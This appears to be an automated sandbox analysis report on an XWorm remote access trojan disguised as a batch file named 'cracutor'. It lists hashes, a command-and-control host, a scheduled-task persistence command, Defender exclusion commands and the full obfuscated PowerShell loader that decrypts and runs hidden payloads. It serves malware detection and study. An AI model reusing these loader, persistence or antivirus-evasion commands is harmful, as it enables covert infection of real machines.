xworm | 108a8547e28be119cf8aaabc2b44e117e599a69297f9e186ab7635dec6e27b04

Analysis

max time kernel
25s
max time network
49s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
24-05-2024 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cracutor1.0/cracutor (1)/RuntimeBroker.bat
Size

1.4MB
MD5

5f2ca709edfb4aab62c0d293fc078a8d
SHA1

e0ee77775465e261c7e0f48643c6d66af21841c2
SHA256

5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
SHA512

833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf
SSDEEP

24576:Jo2hIxM0iKuWJzW21FPYEbTT9bLZfSRAHRtaBLmc2ZlzLMLM1XwXuV:s++iu3b15f7t4l0LMLM0uV

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

publisher-misc.gl.at.ply.gg:58207:58207

publisher-misc.gl.at.ply.gg:58207

Attributes

Install_directory
%Temp%
install_file
RuntimeBroker.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/4252-50-0x000001E273BA0000-0x000001E273BB4000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 4252 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4252 powershell.exe
4920 powershell.exe
900 powershell.exe
916 powershell.exe
432 powershell.exe
2552 powershell.exe
2928 powershell.exe

flow	pid	process
4	4252	powershell.exe

pid	process
4252	powershell.exe
4920	powershell.exe
900	powershell.exe
916	powershell.exe
432	powershell.exe
2552	powershell.exe
2928	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

Neptune.exe

pid process

4060 Neptune.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4060	Neptune.exe

Modifies registry class 3 IoCs

Processes:

Neptune.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Neptune.exe
Key created	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Neptune.exe
Key created	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4920	powershell.exe
4920	powershell.exe
900	powershell.exe
900	powershell.exe
4252	powershell.exe
4252	powershell.exe
916	powershell.exe
916	powershell.exe
432	powershell.exe
432	powershell.exe
2552	powershell.exe
2552	powershell.exe
2928	powershell.exe
2928	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeIncreaseQuotaPrivilege	900	powershell.exe
Token: SeSecurityPrivilege	900	powershell.exe
Token: SeTakeOwnershipPrivilege	900	powershell.exe
Token: SeLoadDriverPrivilege	900	powershell.exe
Token: SeSystemProfilePrivilege	900	powershell.exe
Token: SeSystemtimePrivilege	900	powershell.exe
Token: SeProfSingleProcessPrivilege	900	powershell.exe
Token: SeIncBasePriorityPrivilege	900	powershell.exe
Token: SeCreatePagefilePrivilege	900	powershell.exe
Token: SeBackupPrivilege	900	powershell.exe
Token: SeRestorePrivilege	900	powershell.exe
Token: SeShutdownPrivilege	900	powershell.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeSystemEnvironmentPrivilege	900	powershell.exe
Token: SeRemoteShutdownPrivilege	900	powershell.exe
Token: SeUndockPrivilege	900	powershell.exe
Token: SeManageVolumePrivilege	900	powershell.exe
Token: 33	900	powershell.exe
Token: 34	900	powershell.exe
Token: 35	900	powershell.exe
Token: 36	900	powershell.exe
Token: SeIncreaseQuotaPrivilege	900	powershell.exe
Token: SeSecurityPrivilege	900	powershell.exe
Token: SeTakeOwnershipPrivilege	900	powershell.exe
Token: SeLoadDriverPrivilege	900	powershell.exe
Token: SeSystemProfilePrivilege	900	powershell.exe
Token: SeSystemtimePrivilege	900	powershell.exe
Token: SeProfSingleProcessPrivilege	900	powershell.exe
Token: SeIncBasePriorityPrivilege	900	powershell.exe
Token: SeCreatePagefilePrivilege	900	powershell.exe
Token: SeBackupPrivilege	900	powershell.exe
Token: SeRestorePrivilege	900	powershell.exe
Token: SeShutdownPrivilege	900	powershell.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeSystemEnvironmentPrivilege	900	powershell.exe
Token: SeRemoteShutdownPrivilege	900	powershell.exe
Token: SeUndockPrivilege	900	powershell.exe
Token: SeManageVolumePrivilege	900	powershell.exe
Token: 33	900	powershell.exe
Token: 34	900	powershell.exe
Token: 35	900	powershell.exe
Token: 36	900	powershell.exe
Token: SeIncreaseQuotaPrivilege	900	powershell.exe
Token: SeSecurityPrivilege	900	powershell.exe
Token: SeTakeOwnershipPrivilege	900	powershell.exe
Token: SeLoadDriverPrivilege	900	powershell.exe
Token: SeSystemProfilePrivilege	900	powershell.exe
Token: SeSystemtimePrivilege	900	powershell.exe
Token: SeProfSingleProcessPrivilege	900	powershell.exe
Token: SeIncBasePriorityPrivilege	900	powershell.exe
Token: SeCreatePagefilePrivilege	900	powershell.exe
Token: SeBackupPrivilege	900	powershell.exe
Token: SeRestorePrivilege	900	powershell.exe
Token: SeShutdownPrivilege	900	powershell.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeSystemEnvironmentPrivilege	900	powershell.exe
Token: SeRemoteShutdownPrivilege	900	powershell.exe
Token: SeUndockPrivilege	900	powershell.exe
Token: SeManageVolumePrivilege	900	powershell.exe
Token: 33	900	powershell.exe
Token: 34	900	powershell.exe
Token: 35	900	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 3408 wrote to memory of 4920	3408	cmd.exe	powershell.exe
PID 3408 wrote to memory of 4920	3408	cmd.exe	powershell.exe
PID 4920 wrote to memory of 900	4920	powershell.exe	powershell.exe
PID 4920 wrote to memory of 900	4920	powershell.exe	powershell.exe
PID 4920 wrote to memory of 956	4920	powershell.exe	WScript.exe
PID 4920 wrote to memory of 956	4920	powershell.exe	WScript.exe
PID 956 wrote to memory of 4876	956	WScript.exe	cmd.exe
PID 956 wrote to memory of 4876	956	WScript.exe	cmd.exe
PID 4876 wrote to memory of 4252	4876	cmd.exe	powershell.exe
PID 4876 wrote to memory of 4252	4876	cmd.exe	powershell.exe
PID 4252 wrote to memory of 4060	4252	powershell.exe	Neptune.exe
PID 4252 wrote to memory of 4060	4252	powershell.exe	Neptune.exe
PID 4252 wrote to memory of 4060	4252	powershell.exe	Neptune.exe
PID 4252 wrote to memory of 916	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 916	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 432	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 432	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 2552	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 2552	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 2928	4252	powershell.exe	powershell.exe
PID 4252 wrote to memory of 2928	4252	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_49_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_49.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_49.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_49.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_49.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_49.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4252

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"
6⤵
- Executes dropped EXE
- Modifies registry class
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2928

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a4be454dcbec32af10161f739ec237fc

SHA1
44d5b3b34f92818563efeb37dc75442273cc2bf3

SHA256
4436e1add60e37baccc40f44b93b8ee2baf4261b5e3e45a834ba350ec9658f15

SHA512
a925de5c086cb81b50136d78dc7aea45f8205b57ae8b6219f3d00016b33ebec7e85d7630baf0c09ec2ed29a87c68f0cdefcfd21eb7e99a5679dc632cb725fc4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7b14efd02796c1bc5dcba81d19f112fb

SHA1
9a0e9aa3698227387a0e8fbacffa3e35c96fd25b

SHA256
1e86b2faa4cdc4dc3776bb73e33fad4df2d7f9eaae84326692491023a9efa9d0

SHA512
aad2a7a509fa424bd865677361c6d8dd23ed9c13f56d9aeb1ac96828741e9a79bdddcffa7673a74693c5b3acad89c99b6602ea5fe9b1720eb85b4e26fcaaaf56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
05b3cd21c1ec02f04caba773186ee8d0

SHA1
39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

SHA256
911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

SHA512
e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9d17e8585400bc639a8b261083920ec3

SHA1
aef71cce477bd67115a4e2a0a86e6b8f0f62e30a

SHA256
81fa386fa9b3d185839bec826c3f8cc422e1f329792b901d61be826d42a57fc1

SHA512
235c6644c1349c77f2805c400fd1091a8775b7e63a2ba2e360418faaeb8b696da13ea7bb33a2d92b35f3fafd30fa6945c2398fba7bba39cf5f037a7d900878d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajc4drj0.dgy.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
Filesize
2.0MB

MD5
03d0c69e31fd77718e661722361c0a5c

SHA1
04e02539771963a628477f6546be48d2d912a612

SHA256
255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78

SHA512
94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_49.bat
Filesize
1.4MB

MD5
5f2ca709edfb4aab62c0d293fc078a8d

SHA1
e0ee77775465e261c7e0f48643c6d66af21841c2

SHA256
5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05

SHA512
833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_49.vbs
Filesize
114B

MD5
d9eec9b625bce13dc72853f75972c180

SHA1
e50f6f8df60dbd362d571d0766672aa2cfbe95b7

SHA256
06574d1a4b1637a1c4c185684f0b87fd0e4d0a14783257fd900ce65b17661e07

SHA512
b8a77b2d17ddbb1f614c4dd021993e75dc7c9026f9001ae3cd67a2bba0340281492d22ff2b52b96ca98f244027e7782255b9f8dfb7c38b0ac716df92c3380445

Download Submit
memory/900-16-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/900-25-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/900-26-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/900-27-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/900-30-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4060-63-0x0000000005110000-0x00000000051AE000-memory.dmp

Filesize
632KB

Download
memory/4060-65-0x0000000005560000-0x0000000005568000-memory.dmp

Filesize
32KB

Download
memory/4060-66-0x00000000055B0000-0x00000000055E8000-memory.dmp

Filesize
224KB

Download
memory/4060-67-0x0000000005580000-0x000000000558E000-memory.dmp

Filesize
56KB

Download
memory/4060-64-0x0000000005BD0000-0x0000000005C62000-memory.dmp

Filesize
584KB

Download
memory/4060-61-0x00000000001A0000-0x000000000039E000-memory.dmp

Filesize
2.0MB

Download
memory/4060-62-0x0000000005620000-0x0000000005BC6000-memory.dmp

Filesize
5.6MB

Download
memory/4252-50-0x000001E273BA0000-0x000001E273BB4000-memory.dmp

Filesize
80KB

Download
memory/4920-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

Filesize
8KB

Download
memory/4920-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-14-0x000002AD64540000-0x000002AD6474A000-memory.dmp

Filesize
2.0MB

Download
memory/4920-13-0x000002AD44050000-0x000002AD44058000-memory.dmp

Filesize
32KB

Download
memory/4920-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download
memory/4920-9-0x000002AD44060000-0x000002AD44082000-memory.dmp

Filesize
136KB

Download
memory/4920-111-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

Filesize
8KB

Download
memory/4920-112-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

Filesize
10.8MB

Download